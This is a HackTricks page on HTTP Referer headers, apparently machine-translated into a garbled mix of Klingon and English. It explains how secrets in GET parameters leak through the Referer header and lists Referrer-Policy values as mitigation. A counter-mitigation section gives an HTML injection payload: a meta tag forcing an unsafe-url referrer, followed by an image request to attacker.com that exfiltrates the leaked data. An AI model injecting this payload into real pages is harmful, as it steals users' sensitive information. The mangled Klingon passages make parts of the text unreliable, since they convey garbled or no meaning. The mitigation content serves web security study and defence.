hacktricks/interesting-http.md
2024-02-10 17:52:19 +00:00

3.3 KiB

qaStaHvIS AWS hacking vItlh zero to hero htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Referrer headers and policy

Referrer vItlh browsers lo'laH previous page visited jImej.

Sensitive information leaked

If at some point inside a web page any sensitive information is located on a GET request parameters, if the page contains links to external sources or an attacker is able to make/suggest (social engineering) the user visit a URL controlled by the attacker. It could be able to exfiltrate the sensitive information inside the latest GET request.

Mitigation

You can make the browser follow a Referrer-policy that could avoid the sensitive information to be sent to other web applications:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Counter-Mitigation

{HTML meta tag translation} (HTML injection attack vItlhutlh):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

QeH

jImej GET parameters qojDaq pagh URL Daq vItlhutlh.

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: